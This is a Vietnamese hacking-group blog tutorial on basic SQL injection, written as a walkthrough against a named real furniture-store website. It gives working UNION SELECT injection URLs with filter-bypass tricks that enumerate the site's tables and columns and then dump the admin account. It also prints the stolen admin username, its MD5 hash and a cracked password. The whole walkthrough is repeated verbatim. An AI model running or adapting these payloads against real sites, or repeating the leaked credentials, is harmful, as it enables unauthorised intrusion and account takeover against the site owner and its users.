Joker Blog
Nguyễn Anh Pha
SQLi cơ bản
Victim: http://noithatgiathanh.com.vn/
Get order by bình thường chắc các bạn cũng biết query rồi
Order by ...--+-
Sau khi ra được phần Order by ta Union Select nó để get version
Get version: Version()
Get Table:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--+-
Đây là trường hơp khi mình query theo cách bình thường nhưng ko thấy hiện ra các table, ta phải dùng bypass là unhex(hex( để tiến hành làm xuất dữ liệu của table ra
"tbl_access,tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_home,tbl_product_pro,tbl_product_sell,tbl_product_special,tbl_user,tbl_visitor"
Get Column:
Tương tự như query table_name ta chỉ việc thay table_name trong group_concat thành column_name
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_schema=database()--+-
"id,date,id,code,name,detail,date_added,last_modified,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,name,sex,company,address,city,country,tel,fax,email,website,uid,pwd,status,date_added,last_modified,note,code,orderid,id,code,member_id,date_added,last_modified,id,order_id,product_id,quantity,price,status,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,status1,pro_new,pro_sell,checksao,date_added,last_modified,lang,price,luotxem,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,product_id,price,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,uid,pwd,session_id,activity,member,ip_address,url"
Ta chỉ lưu ý đến column có thể chứ tài khoản login của ADMIN thôi
=> "uid, pwd"
Get tài khoản:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!uid,0x7c,pwd*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_user--+-
=>"admin|975e89cd02486d78cc50bb06678a5969"
ID: admin
pass: 975e89cd02486d78cc50bb06678a5969
MD5: ceh
Victim: http://noithatgiathanh.com.vn/
Get order by bình thường chắc các bạn cũng biết query rồi
Order by ...--+-
Sau khi ra được phần Order by ta Union Select nó để get version
Get version: Version()
Get Table:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--+-
Đây là trường hơp khi mình query theo cách bình thường nhưng ko thấy hiện ra các table, ta phải dùng bypass là unhex(hex( để tiến hành làm xuất dữ liệu của table ra
"tbl_access,tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_home,tbl_product_pro,tbl_product_sell,tbl_product_special,tbl_user,tbl_visitor"
Get Column:
Tương tự như query table_name ta chỉ việc thay table_name trong group_concat thành column_name
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_schema=database()--+-
"id,date,id,code,name,detail,date_added,last_modified,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,name,sex,company,address,city,country,tel,fax,email,website,uid,pwd,status,date_added,last_modified,note,code,orderid,id,code,member_id,date_added,last_modified,id,order_id,product_id,quantity,price,status,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,status1,pro_new,pro_sell,checksao,date_added,last_modified,lang,price,luotxem,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,product_id,price,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,uid,pwd,session_id,activity,member,ip_address,url"
Ta chỉ lưu ý đến column có thể chứ tài khoản login của ADMIN thôi
=> "uid, pwd"
Get tài khoản:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!uid,0x7c,pwd*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_user--+-
=>"admin|975e89cd02486d78cc50bb06678a5969"
ID: admin
pass: 975e89cd02486d78cc50bb06678a5969
MD5: ceh
Tutorials By Quý Huỳnh, Admin VN-Hacking Group
